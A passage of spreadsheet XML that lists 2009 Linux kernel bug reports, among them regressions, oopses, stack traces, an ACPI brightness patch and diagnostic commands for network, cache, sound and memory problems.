    <t>I want to create vlan interface which uses jumbo frames while underlying network device is still using standerd 1500 bytes frames. So I tried: tkepczyx-mobl1:~# ip link show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP qlen 100 link/ether 00:0d:60:79:e0:9d brd ff:ff:ff:ff:ff:ff tkepczyx-mobl1:~# vconfig add eth0 12 Added VLAN with VID == 12 to IF -:eth0:- tkepczyx-mobl1:~# ip link set dev eth0.12 mtu 9000 RTNETLINK answers: Numerical result out of range So I made sure that eth0 supports 9000 bytes mtu: tkepczyx-mobl1:~# ip link set dev eth0 mtu 9000 tkepczyx-mobl1:~# ip link show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 9000 qdisc pfifo_fast state UP qlen 100 link/ether 00:0d:60:79:e0:9d brd ff:ff:ff:ff:ff:ff It apparently does. So I gave it another try: tkepczyx-mobl1:~# ip link set dev eth0.12 mtu 9000 tkepczyx-mobl1:~# ip link show dev eth0.12 4: eth0.12@eth0: &lt;BROADCAST,MULTICAST&gt; mtu 9000 qdisc noop state DOWN link/ether 00:0d:60:79:e0:9d brd ff:ff:ff:ff:ff:ff Now it worked. So lets decrease mtu on eth0: tkepczyx-mobl1:~# ip link set dev eth0 mtu 1500 tkepczyx-mobl1:~# ip link show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP qlen 100 link/ether 00:0d:60:79:e0:9d brd ff:ff:ff:ff:ff:ff tkepczyx-mobl1:~# ip link show dev eth0.12 4: eth0.12@eth0: &lt;BROADCAST,MULTICAST&gt; mtu 9000 qdisc noop state DOWN link/ether 00:0d:60:79:e0:9d brd ff:ff:ff:ff:ff:ff It also worked. Now - if there is a reason which prevents me to increase mtu on vlan over mtu on underlyng device, the very same reason should have prevented me from decreasing mtu on underlying eth0 below mtu on eth0.12 vlan. This is a fault. I started digging a bit in sources and there is one thing which rings a bell: vlan_dev_change_mtu function in net/8021q/vlan_dev.c: static int vlan_dev_change_mtu(struct net_device *dev, int new_mtu) { /* TODO: gotta make sure the underlying layer can handle it, * maybe an IFF_VLAN_CAPABLE flag for devices? */ if (vlan_dev_info(dev)-&gt;real_dev-&gt;mtu &lt; new_mtu) return -ERANGE; dev-&gt;mtu = new_mtu; return 0; } My guess is that check in if() statement above is against currently configured mtu while it probably should check what physically device can transmit.</t>
  </si>
  <si>
    <t>fscache crash</t>
  </si>
  <si>
    <t>2.6.30-rc8</t>
  </si>
  <si>
    <t>2009-06-07 09:20 UTC</t>
  </si>
  <si>
    <t>Adrian von Bidder</t>
  </si>
  <si>
    <t>2010-01-25 15:35 UTC</t>
  </si>
  <si>
    <t>David Howells</t>
  </si>
  <si>
    <t>Using Debian 2.6.30-rc8 packages on a 686. fsc is mounted &amp; started, reading from those files the cache starts to be populated ok, but re-reading these files immediately creates the following stack trace: +++ Jun 6 18:59:58 syydelaervli kernel: [ 1107.260445] Pid: 2104, comm: kslowd Not tainted 2.6.30-rc8-686 #1 Jun 6 18:59:59 syydelaervli kernel: [ 1107.260535] Call Trace: Jun 6 18:59:59 syydelaervli kernel: [ 1107.260656] [&lt;c917c6ee&gt;] ? cachefiles_read_waiter+0x45/0xc0 [cachefiles] Jun 6 18:59:59 syydelaervli kernel: [ 1107.260762] [&lt;c011bce5&gt;] ? __wake_up_common+0x34/0x59 Jun 6 18:59:59 syydelaervli kernel: [ 1107.260849] [&lt;c011c5af&gt;] ? __wake_up+0x29/0x39 Jun 6 18:59:59 syydelaervli kernel: [ 1107.260941] [&lt;c0136869&gt;] ? __wake_up_bit+0x29/0x2e Jun 6 18:59:59 syydelaervli kernel: [ 1107.261151] [&lt;c8abde27&gt;] ? ext3_truncate+0x365/0x710 [ext3] Jun 6 18:59:59 syydelaervli kernel: [ 1107.261262] [&lt;c017b13b&gt;] ? vmtruncate+0xf6/0x119 Jun 6 18:59:59 syydelaervli kernel: [ 1107.261343] [&lt;c019c011&gt;] ? inode_setattr+0x4b/0x11b Jun 6 18:59:59 syydelaervli kernel: [ 1107.261496] [&lt;c8abbccd&gt;] ? ext3_setattr+0x156/0x1ab [ext3] Jun 6 18:59:59 syydelaervli kernel: [ 1107.261583] [&lt;c019c233&gt;] ? notify_change+0x152/0x28f Jun 6 18:59:59 syydelaervli kernel: [ 1107.261674] [&lt;c01a8000&gt;] ? block_read_full_page+0x233/0x270 Jun 6 18:59:59 syydelaervli kernel: [ 1107.261778] [&lt;c917a2bc&gt;] ? cachefiles_attr_changed+0xfb/0x156 [cachefiles] Jun 6 18:59:59 syydelaervli kernel: [ 1107.261933] [&lt;c8ff6f6c&gt;] ? fscache_lookup_object+0xe2/0xf4 [fscache] Jun 6 18:59:59 syydelaervli kernel: [ 1107.262052] [&lt;c8ff7357&gt;] ? fscache_object_slow_work_execute+0x187/0x567 [fscache] Jun 6 18:59:59 syydelaervli kernel: [ 1107.262160] [&lt;c0169f55&gt;] ? slow_work_thread+0x264/0x3f3 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262248] [&lt;c01368ca&gt;] ? autoremove_wake_function+0x0/0x2d Jun 6 18:59:59 syydelaervli kernel: [ 1107.262331] [&lt;c0169cf1&gt;] ? slow_work_thread+0x0/0x3f3 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262412] [&lt;c01365dc&gt;] ? kthread+0x42/0x67 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262490] [&lt;c013659a&gt;] ? kthread+0x0/0x67 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262584] [&lt;c0103ab7&gt;] ? kernel_thread_helper+0x7/0x10 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262777] CacheFiles: I/O Error: Readpage failed on backing file 40000830 Jun 6 18:59:59 syydelaervli kernel: [ 1107.262862] FS-Cache: Cache cachefiles stopped due to I/O error +++ (this one if using nfs3, but nfs4 behaves the same.)</t>
  </si>
  <si>
    <t>Machine doesn't boot due to mmconfig detection problem</t>
  </si>
  <si>
    <t>2009-06-07 11:36 UTC</t>
  </si>
  <si>
    <t>2009-06-28 19:09 UTC</t>
  </si>
  <si>
    <t>Subject : Stable regression 2.6.29.3 vs 2.6.29.2 Submitter : Pascal Terjan &lt;pterjan@mandriva.com&gt; Date : 2009-05-29 19:35 References : http://marc.info/?l=linux-kernel&amp;m=124388792118481&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Patch : http://patchwork.kernel.org/patch/27613/ Caused by: commit 044cd80942e47b9de0915b627902adf05c52377f Author: Yinghai Lu &lt;yinghai@kernel.org&gt; Date: Sat Apr 18 01:43:46 2009 -0700 x86/PCI: don't call e820_all_mapped with -1 in the mmconfig case e820_all_mapped need end is (addr + size) instead of (addr + size - 1) Cc: stable@kernel.org Acked-by: Ingo Molnar &lt;mingo@elte.hu&gt; Signed-off-by: Yinghai Lu &lt;yinghai@kernel.org&gt; Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; First-Bad-Commit : 044cd80942e47b9de0915b627902adf05c52377f This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops with minicom and USB serial</t>
  </si>
  <si>
    <t>2009-06-07 11:52 UTC</t>
  </si>
  <si>
    <t>2009-07-27 21:54 UTC</t>
  </si>
  <si>
    <t>Subject : Oops with minicom and USB serial with Linux 2.6.30-rc8 Submitter : Peter Chubb &lt;peterc@gelato.unsw.edu.au&gt; Date : 2009-06-05 1:37 References : http://marc.info/?l=linux-kernel&amp;m=124416901026700&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops whilst booting</t>
  </si>
  <si>
    <t>2009-06-07 12:13 UTC</t>
  </si>
  <si>
    <t>2009-06-09 11:39 UTC</t>
  </si>
  <si>
    <t>Jaswinder Singh Rajput</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc8 Oops whilst booting Submitter : Chris Clayton &lt;chris2553@googlemail.com&gt; Date : 2009-06-06 18:59 References : http://marc.info/?l=linux-kernel&amp;m=124431487924254&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>suspend/hibernate lockdep warning</t>
  </si>
  <si>
    <t>2009-06-07 12:17 UTC</t>
  </si>
  <si>
    <t>2009-07-27 21:56 UTC</t>
  </si>
  <si>
    <t>Subject : suspend/hibernate lockdep warning Submitter : Dave Young &lt;hidave.darkstar@gmail.com&gt; Date : 2009-06-02 10:00 References : http://marc.info/?l=linux-kernel&amp;m=124393723321241&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ath9k receives PCI FATAL interrupt under 2.6.30</t>
  </si>
  <si>
    <t>IA-64 Linux</t>
  </si>
  <si>
    <t>2.6.30-8</t>
  </si>
  <si>
    <t>2009-06-08 04:13 UTC</t>
  </si>
  <si>
    <t>Phil Linttell</t>
  </si>
  <si>
    <t>Created attachment 21804 [details] lspci -vvnn I'm running ubuntu karmic alpha 1 and with kernel 2.6.30-7 and 2.6.30-8 wireless networking dies shortly after boot-up with the following message in the log: [ 6163.608689] ath9k: received PCI FATAL interrupt [ 6167.608585] wlan0: no probe response from AP 00:18:39:6f:60:02 - disassociating This does not occur under with kernel 2.6.29.2 or 2.6.29.1 on the same system. I can get networking working again for a short time with: modprobe -r ath9k modprobe ath9k /etc/init.d/networking restart But it will soon die again with the same message. My wireless networking has been solid for months, and only fails under 2.6.30.</t>
  </si>
  <si>
    <t>System report Int 6 error if E820 table reserve the memory above 4G</t>
  </si>
  <si>
    <t>2009-06-08 04:44 UTC</t>
  </si>
  <si>
    <t>Peer Chen</t>
  </si>
  <si>
    <t>2012-06-08 11:44 UTC</t>
  </si>
  <si>
    <t>The bug is introduced from kernel 2.6.27, if E820 table reserve the memory above 4G in 32bit OS(BIOS-e820: 00000000fff80000 - 0000000120000000 (reserved)), system will report Int 6 error and hang up. The bug is caused by the following code in drivers/firmware/memmap.c, the resource_size_t is 32bit variable in 32bit OS, the BUG_ON() will be invoked to result in the Int 6 error. I try the latest 32bit Ubuntu and Fedora distributions, all hit this bug. ====== static int firmware_map_add_entry(resource_size_t start, resource_size_t end, const char *type, struct firmware_map_entry *entry) { BUG_ON(start &gt; end); entry-&gt;start = start; entry-&gt;end = end; entry-&gt;type = type; INIT_LIST_HEAD(&amp;entry-&gt;list); kobject_init(&amp;entry-&gt;kobj, &amp;memmap_ktype); list_add_tail(&amp;entry-&gt;list, &amp;map_entries); return 0; }</t>
  </si>
  <si>
    <t>Console uses less than full resolution</t>
  </si>
  <si>
    <t>2009-06-08 10:16 UTC</t>
  </si>
  <si>
    <t>Brian Rogers</t>
  </si>
  <si>
    <t>2009-06-14 16:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 21805 [details] dmesg output I have a laptop with i965 graphics and a 1280x800 display. Up until a certain commit, the KMS framebuffer filled the whole screen at native resolution. Since this commit, the console fills only a 1024x768 area, anchored to the top left corner, leaving blank the right and bottom edges of the screen. usplash also runs at 1024x768. X still uses 1280x800, however. The console appears to be picking a resolution to accommodate the TV out, according to the following in dmesg: [ 1.217492] allocated 1280x800 fb: 0x007df000, bo ffff88013e6d2540 [ 1.279983] [drm] TV-13: set mode 1024x768 18 [ 1.360854] [drm] LVDS-8: set mode 1280x800 15 [ 1.645634] Console: switching to colour frame buffer device 128x48 [ 1.648155] fb0: inteldrmfb frame buffer device No TV is connected, and xrandr correctly reports 'TV1 disconnected'. I assume that the TV out should be irrelevant in picking the console resolution, then. The problem appears with this commit: commit c9fb15f60eb517c958dec64dca9357bf62bf2201 Author: Keith Packard &lt;keithp@keithp.com&gt; Date: Sat May 30 20:42:28 2009 -0700 drm: Hook up DPMS property handling in drm_crtc.c. Add drm_helper_connector_dpms. Making the drm_crtc.c code recognize the DPMS property and invoke the connector-&gt;dpms function doesn't remove any capability from the driver while reducing code duplication. That just highlighted the problem with the existing DPMS functions which could turn off the connector, but failed to turn off any relevant crtcs. The new drm_helper_connector_dpms function manages all of that, using the drm_helper-specific crtc and encoder dpms functions, automatically computing the appropriate DPMS level for each object in the system. This fixes the current troubles in the i915 driver which left PLLs, pipes and planes running while in DPMS_OFF mode or even while they were unused. Signed-off-by: Keith Packard &lt;keithp@keithp.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt;</t>
  </si>
  <si>
    <t>snd-intel8x0 Clocks too fast</t>
  </si>
  <si>
    <t>2009-06-08 12:43 UTC</t>
  </si>
  <si>
    <t>2012-06-08 11:48 UTC</t>
  </si>
  <si>
    <t>Commit http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=d695e4ea860fc1cbe1e4b101af4e0450219f2db9 Introduces a quirks table for the intel8x0 driver, however the the table is incorrect for the integrated sound card on a Dell Optiplex GX150. The entry SND_PCI_QUIRK(0x1028, 0x00be, "AD1885", 44100) sets the clock rate to 44.1kHz, however this is too high, resulting in sound which is too high in pitch and skips when playing movies (because the sound stream is consumed faster than the video stream). Loading the module with ac97_clock=41000 results in the correct speed and pitch. The device is: $ lspci -nmvks 00:1f.5 Device: 00:1f.5 Class: 0401 Vendor: 8086 Device: 2445 SVendor: 1028 SDevice: 00be Rev: 02 Driver: Intel ICH Module: snd-intel8x0</t>
  </si>
  <si>
    <t>Kernel panic - not syncing: Attepmted to kill init! (Fedora 10)</t>
  </si>
  <si>
    <t>2.6.27.21</t>
  </si>
  <si>
    <t>2009-06-10 12:05 UTC</t>
  </si>
  <si>
    <t>Nyyr</t>
  </si>
  <si>
    <t>2012-06-08 11:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 21839 [details] Panic screen photo Cannot boot Fedora 10 using this and newer kernel versions. Last kernel version working is 2.6.27.5. I have no idea what should I try to make it work.... This is transcription of the panic screen (see attached photo of CRT): [&lt;ffffffff811f57df&gt;] driver_register+0xa8/0x113 [&lt;ffffffff815c5ada&gt;] ? acpi_pci_root_init+0x0/0x28 [&lt;ffffffff8159f140&gt;] ? early_idt_handler+0x0/0x71 [&lt;ffffffff811b6195&gt;] acpi_bus_register_driver+0x3e/0x41 [&lt;ffffffff815c5af3&gt;] acpi_pci_root_init+0x19/0x28 [&lt;ffffffff8100a047&gt;] do_one_initcall+0x47/0x12e [&lt;ffffffff8159f140&gt;] ? early_idt_handler+0x0/0x71 [&lt;ffffffff81100000&gt;] ? task_statm+0x4e/0x5b [&lt;ffffffff8159f70f&gt;] kernel_init+0x1c0/0x214 [&lt;ffffffff81333489&gt;] ? trace_hardirqs_on_thunk+0x3a/0x3c [&lt;ffffffff81011719&gt;] child_rip+0xa/0x11 [&lt;ffffffff81010a37&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff8159f54f&gt;] ? kernel_init+0x0/0x214 [&lt;ffffffff8101170f&gt;] ? child_rip+0x0/0x11 Code: 49 8d 7e 38 49 8d 46 28 49 89 7e 38 49 89 46 28 49 89 46 30 49 89 7e 48 49 8b 45 10 48 83 78 38 00 74 32 48 8b 40 10 48 8b 40 38 &lt;48&gt; 8b 98 80 00 00 00 48 85 db 75 0d 4c 89 f7 e8 a7 d2 f3 ff e9 RIP [&lt;ffffffff8117d603&gt;] pcie_aspm_init_link_state+0x15e/0x65f RSP &lt;ffff8800bf699a10&gt; CR2: 0000000000000080 ---[ end trace 4eaa2a86a8e2da22 ]--- Kernel panic - not syncing: Attepmted to kill init!</t>
  </si>
  <si>
    <t>Bad _BQC behavior on HP laptops</t>
  </si>
  <si>
    <t>2009-06-11 19:53 UTC</t>
  </si>
  <si>
    <t>showard314</t>
  </si>
  <si>
    <t>2009-09-24 23:12 UTC</t>
  </si>
  <si>
    <t>When changing brightness using hotkeys and gnome-power-manager, the brightness changes apparently randomly up or down. Vladimir 'phcoder' Serbinenko has traced this problem to acpi in the kernel and has posted his desciption and patch on the linux-acpi mailing list. His post from the mailing list [http://marc.info/?l=linux-acpi&amp;m=124456088526538&amp;w=2]: "Hello. On the following model Manufacturer: Packard Bell BV Product Name: EasyNote_BG45-U-001CH BQC returns a value between 0 and 15 but the brightness levels are between 0 and 8. I could make a table of correspondance however I find it too inflexible. So I propose the following patch which disables BQC if it behaves badly -- Regards Vladimir 'phcoder' Serbinenko ["bad_bqc.patch" (text/x-patch)] diff --git a/drivers/acpi/video.c b/drivers/acpi/video.c index 1bdfb37..1735c34 100644 --- a/drivers/acpi/video.c +++ b/drivers/acpi/video.c @@ -594,6 +594,7 @@ acpi_video_device_lcd_get_level_current(struct acpi_video_device *device, unsigned long long *level) { acpi_status status = AE_OK; + int i; if (device-&gt;cap._BQC || device-&gt;cap._BCQ) { char *buf = device-&gt;cap._BQC ? "_BQC" : "_BCQ"; @@ -609,8 +610,15 @@ acpi_video_device_lcd_get_level_current(struct acpi_video_device *device, } *level += bqc_offset_aml_bug_workaround; - device-&gt;brightness-&gt;curr = *level; - return 0; + for (i = 2; i &lt; device-&gt;brightness-&gt;count; i++) + if (device-&gt;brightness-&gt;levels[i] == *level) { + device-&gt;brightness-&gt;curr = *level; + return 0; + } + /* BQC returned an invalid level. Stop using it. */ + ACPI_WARNING((AE_INFO, "%s returned an invalid level", + buf)); + device-&gt;cap._BQC = device-&gt;cap._BCQ = 0; } else { /* Fixme: * should we return an error or ignore this failure? " I have attached his patch to this bug report. Additional reporters have tested the patch and confirmed that it has been working at https://bugs.launchpad.net/ubuntu/+source/gnome-power-manager/+bug/376924</t>
  </si>
  <si>
    <t>Disconnecting PL2303 device while cu is connected to it cause oops</t>
  </si>
  <si>
    <t>2.6.29.4, 2.6.30</t>
  </si>
  <si>
    <t>2009-06-12 08:39 UTC</t>
  </si>
  <si>
    <t>2009-08-05 13:35 UTC</t>
  </si>
  <si>
    <t>Hi, Steps to reproduce oops : 1. insert PL2303 serial converter 2. connect to it with cu (cu -l /dev/ttyUSB0 -s 115200) 3. take out PL2303 converter from the box 4. hit Enter in CU Such behaviour notices since 2.6.29.x. 2.6.28 was correct when disconnecting PL2303 device - cu simply print that line is dsconnected. Can supply any additional info. TIA</t>
  </si>
  <si>
    <t>slab grows with NFS write activity.</t>
  </si>
  <si>
    <t>2009-06-12 09:51 UTC</t>
  </si>
  <si>
    <t>Andrew Randrianasulu</t>
  </si>
  <si>
    <t>2010-10-11 19:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 21869 [details] My .config I first observed this bug with 2.6.30-rc8, while trying to reproduce #13375. After whole night of NFS activity system becomes very slow, i blamed mozilla first, but now i think problem is deeper, at least slabtop clearly showed constantly growing kmalloc-96, without X at all. Current /proc/meminfo (with NFS server active) guest@slax:~$ cat /proc/meminfo MemTotal: 242072 kB MemFree: 6392 kB Buffers: 8864 kB Cached: 65464 kB SwapCached: 2428 kB Active: 59032 kB Inactive: 89468 kB Active(anon): 37384 kB Inactive(anon): 38304 kB Active(file): 21648 kB Inactive(file): 51164 kB Unevictable: 0 kB Mlocked: 0 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 242072 kB LowFree: 6392 kB SwapTotal: 399992 kB SwapFree: 396644 kB Dirty: 48 kB Writeback: 8 kB AnonPages: 71908 kB Mapped: 30376 kB Slab: 78524 kB SReclaimable: 8160 kB SUnreclaim: 70364 kB PageTables: 1364 kB NFS_Unstable: 0 kB Bounce: 0 kB WritebackTmp: 0 kB CommitLimit: 521028 kB Committed_AS: 156896 kB VmallocTotal: 770104 kB VmallocUsed: 6208 kB VmallocChunk: 731224 kB HugePages_Total: 0 HugePages_Free: 0 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 4096 kB DirectMap4k: 262080 kB DirectMap4M: 0 kB ---------- uname -a Linux slax 2.6.30-i486 #4 SMP Thu Jun 11 17:44:06 GMT 2009 i686 AMD Duron(tm) Processor AuthenticAMD GNU/Linux i'll attach kernel .config and few slabtop "screenshots" from console.</t>
  </si>
  <si>
    <t>2.6.30-git3 (-rc2-git2)</t>
  </si>
  <si>
    <t>2009-06-12 19:29 UTC</t>
  </si>
  <si>
    <t>2009-07-08 14:41 UTC</t>
  </si>
  <si>
    <t>Hello. Hard: ASUS F3Jc Kernel: Linux 2.6.30-git3 See attached file for details. Jun 12 21:56:39 kernel: [ 8506.042498] BUG: scheduling while atomic: pptpgw/3167/0x00000400 Jun 12 21:56:39 kernel: [ 8506.042504] Modules linked in: ppp_deflate zlib_deflate ppp_async crc_ccitt ppp_generic slhc ipv6 fuse sbp2 loop snd_hda_codec_si3054 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd soundcore pcspkr i2c_i801 rng_core snd_page_alloc psmouse asus_laptop serio_raw evdev led_class usbhid hid sg sd_mod sr_mod cdrom ata_generic pata_acpi ata_piix ide_pci_generic ohci1394 ieee1394 r8169 mii uhci_hcd ehci_hcd usbcore Jun 12 21:56:39 kernel: [ 8506.042563] Jun 12 21:56:39 kernel: [ 8506.042568] Pid: 3167, comm: pptpgw Tainted: G W (2.6.30-nv-git3 #7) F3JC Jun 12 21:56:39 kernel: [ 8506.042572] EIP: 0060:[&lt;c13e4386&gt;] EFLAGS: 00200246 CPU: 0 Jun 12 21:56:39 kernel: [ 8506.042580] EIP is at _spin_unlock_irqrestore+0x16/0x30 Jun 12 21:56:39 kernel: [ 8506.042583] EAX: c1660040 EBX: 00200246 ECX: 00000000 EDX: 00200246 Jun 12 21:56:39 kernel: [ 8506.042586] ESI: f66b97e0 EDI: 00000001 EBP: f22ebe5c ESP: f22ebe58 Jun 12 21:56:39 kernel: [ 8506.042590] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jun 12 21:56:39 kernel: [ 8506.042593] CR0: 8005003b CR2: b753c000 CR3: 36a91000 CR4: 000006d0 Jun 12 21:56:39 kernel: [ 8506.042596] DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jun 12 21:56:39 kernel: [ 8506.042599] DR6: ffff0ff0 DR7: 00000400 Jun 12 21:56:39 kernel: [ 8506.042601] Call Trace: Jun 12 21:56:39 kernel: [ 8506.042609] [&lt;c12b92cb&gt;] tty_ldisc_deref+0x5b/0x90 Jun 12 21:56:39 kernel: [ 8506.042615] [&lt;c12b2699&gt;] tty_wakeup+0x79/0x90 Jun 12 21:56:39 kernel: [ 8506.042620] [&lt;c12baa23&gt;] pty_unthrottle+0x23/0x50 Jun 12 21:56:39 kernel: [ 8506.042624] [&lt;c12b75f0&gt;] tty_unthrottle+0x40/0x70 Jun 12 21:56:39 kernel: [ 8506.042628] [&lt;c12b571f&gt;] n_tty_read+0x47f/0x720 Jun 12 21:56:39 kernel: [ 8506.042636] [&lt;c103a020&gt;] ? default_wake_function+0x0/0x40 Jun 12 21:56:39 kernel: [ 8506.042640] [&lt;c12b0a28&gt;] tty_read+0x98/0xe0 Jun 12 21:56:39 kernel: [ 8506.042644] [&lt;c12b52a0&gt;] ? n_tty_read+0x0/0x720 Jun 12 21:56:39 kernel: [ 8506.042651] [&lt;c10e5dfb&gt;] vfs_read+0xbb/0x1c0 Jun 12 21:56:39 kernel: [ 8506.042655] [&lt;c12b0990&gt;] ? tty_read+0x0/0xe0 Jun 12 21:56:39 kernel: [ 8506.042659] [&lt;c10e6008&gt;] sys_read+0x58/0xa0 Jun 12 21:56:39 kernel: [ 8506.042665] [&lt;c100320b&gt;] sysenter_do_call+0x12/0x22 Jun 12 22:02:59 kernel: [ 8885.673899] make invoked oom-killer: gfp_mask=0xd0, order=1, oomkilladj=0 Jun 12 22:03:01 kernel: [ 8885.673912] make cpuset=/ mems_allowed=0 Jun 12 22:03:01 kernel: [ 8885.673921] Pid: 10957, comm: make Tainted: G W 2.6.30-nv-git3 #7 Jun 12 22:03:01 kernel: [ 8885.673927] Call Trace: Jun 12 22:03:01 kernel: [ 8885.673944] [&lt;c10b6384&gt;] T.392+0xc4/0x250 Jun 12 22:03:01 kernel: [ 8885.673954] [&lt;c10b61b5&gt;] ? badness+0x135/0x240 Jun 12 22:03:01 kernel: [ 8885.673965] [&lt;c10b665a&gt;] __out_of_memory+0x14a/0x170 Jun 12 22:03:01 kernel: [ 8885.673975] [&lt;c10b66d9&gt;] out_of_memory+0x59/0xb0 Jun 12 22:03:01 kernel: [ 8885.673985] [&lt;c10b98dd&gt;] __alloc_pages_internal+0x47d/0x4d0 Jun 12 22:03:01 kernel: [ 8885.673996] [&lt;c10b99a8&gt;] __get_free_pages+0x28/0x60 Jun 12 22:03:01 kernel: [ 8885.674007] [&lt;c103daea&gt;] copy_process+0xca/0x1090 Jun 12 22:03:01 kernel: [ 8885.674017] [&lt;c103eb34&gt;] do_fork+0x84/0x3a0 Jun 12 22:03:01 kernel: [ 8885.674027] [&lt;c100b958&gt;] sys_vfork+0x38/0x50 Jun 12 22:03:01 kernel: [ 8885.674036] [&lt;c10032d8&gt;] syscall_call+0x7/0xb Jun 12 22:03:01 kernel: [ 8885.674042] Mem-Info: Jun 12 22:03:01 kernel: [ 8885.674047] DMA per-cpu: Jun 12 22:03:01 kernel: [ 8885.674053] CPU 0: hi: 0, btch: 1 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674059] CPU 1: hi: 0, btch: 1 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674064] Normal per-cpu: Jun 12 22:03:01 kernel: [ 8885.674070] CPU 0: hi: 186, btch: 31 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674076] CPU 1: hi: 186, btch: 31 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674081] HighMem per-cpu: Jun 12 22:03:01 kernel: [ 8885.674087] CPU 0: hi: 42, btch: 7 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674093] CPU 1: hi: 42, btch: 7 usd: 0 Jun 12 22:03:01 kernel: [ 8885.674102] Active_anon:7322 active_file:8880 inactive_anon:9533 Jun 12 22:03:01 kernel: [ 8885.674105] inactive_file:6083 unevictable:0 dirty:5 writeback:0 unstable:0 Jun 12 22:03:01 kernel: [ 8885.674109] free:73824 slab:102205 mapped:8845 pagetables:561 bounce:0 Jun 12 22:03:01 kernel: [ 8885.674120] DMA free:3520kB min:64kB low:80kB high:96kB active_anon:0kB inactive_anon:12kB active_file:0kB inactive_file:0kB unevictable:0kB present:15804kB pages_scanned:0 all_unreclaimable? no Jun 12 22:03:01 kernel: [ 8885.674129] lowmem_reserve[]: 0 865 999 999 Jun 12 22:03:01 kernel: [ 8885.674145] Normal free:269068kB min:3728kB low:4660kB high:5592kB active_anon:32kB inactive_anon:56kB active_file:7112kB inactive_file:7076kB unevictable:0kB present:885944kB pages_scanned:0 all_unreclaimable? no Jun 12 22:03:01 kernel: [ 8885.674154] lowmem_reserve[]: 0 0 1076 1076 Jun 12 22:03:01 kernel: [ 8885.674170] HighMem free:22708kB min:132kB low:276kB high:420kB active_anon:29256kB inactive_anon:38064kB active_file:28408kB inactive_file:17256kB unevictable:0kB present:137832kB pages_scanned:0 all_unreclaimable? no Jun 12 22:03:01 kernel: [ 8885.674178] lowmem_reserve[]: 0 0 0 0 Jun 12 22:03:01 kernel: [ 8885.674189] DMA: 6*4kB 395*8kB 21*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 3520kB Jun 12 22:03:01 kernel: [ 8885.674216] Normal: 66712*4kB 55*8kB 0*16kB 1*32kB 0*64kB 0*128kB 1*256kB 1*512kB 1*1024kB 0*2048kB 0*4096kB = 269112kB Jun 12 22:03:01 kernel: [ 8885.674243] HighMem: 1126*4kB 1333*8kB 278*16kB 50*32kB 18*64kB 3*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22752kB Jun 12 22:03:01 kernel: [ 8885.674271] 15997 total pagecache pages Jun 12 22:03:01 kernel: [ 8885.674276] 777 pages in swap cache Jun 12 22:03:01 kernel: [ 8885.674282] Swap cache stats: add 13528, delete 12751, find 702/875 Jun 12 22:03:01 kernel: [ 8885.674287] Free swap = 826996kB Jun 12 22:03:01 kernel: [ 8885.674291] Total swap = 875500kB Jun 12 22:03:01 kernel: [ 8885.679660] 262040 pages RAM Jun 12 22:03:01 kernel: [ 8885.679665] 34730 pages HighMem Jun 12 22:03:01 kernel: [ 8885.679670] 3930 pages reserved Jun 12 22:03:01 kernel: [ 8885.679674] 53968 pages shared Jun 12 22:03:01 kernel: [ 8885.679678] 134773 pages non-shared Jun 12 22:03:01 kernel: [ 8885.679686] Out of memory: kill process 3212 (kopete) score 17744 or a child Jun 12 22:03:01 kernel: [ 8885.679726] Killed process 3212 (kopete) Jun 12 22:03:01 kernel: [ 8886.099540] sh invoked oom-killer: gfp_mask=0xd0, order=1, oomkilladj=0 Jun 12 22:03:01 kernel: [ 8886.099552] sh cpuset=/ mems_allowed=0 Jun 12 22:03:01 kernel: [ 8886.099561] Pid: 11238, comm: sh Tainted: G W 2.6.30-nv-git3 #7 Jun 12 22:03:01 kernel: [ 8886.099567] Call Trace: ... /* truncated since comment's size is limited to 65536. see attached file for details. */ Jun 12 22:06:39 kernel: [ 9105.449449] SysRq : Keyboard mode set to system default Jun 12 22:06:39 exiting on signal 15 Jun 12 22:09:04 syslogd 1.5.0#5: restart. Sergey</t>
  </si>
  <si>
    <t>2.6.30 fails when removing second battery - Thinkpad R400</t>
  </si>
  <si>
    <t>2009-06-14 08:45 UTC</t>
  </si>
  <si>
    <t>Vojtech Gondzala</t>
  </si>
  <si>
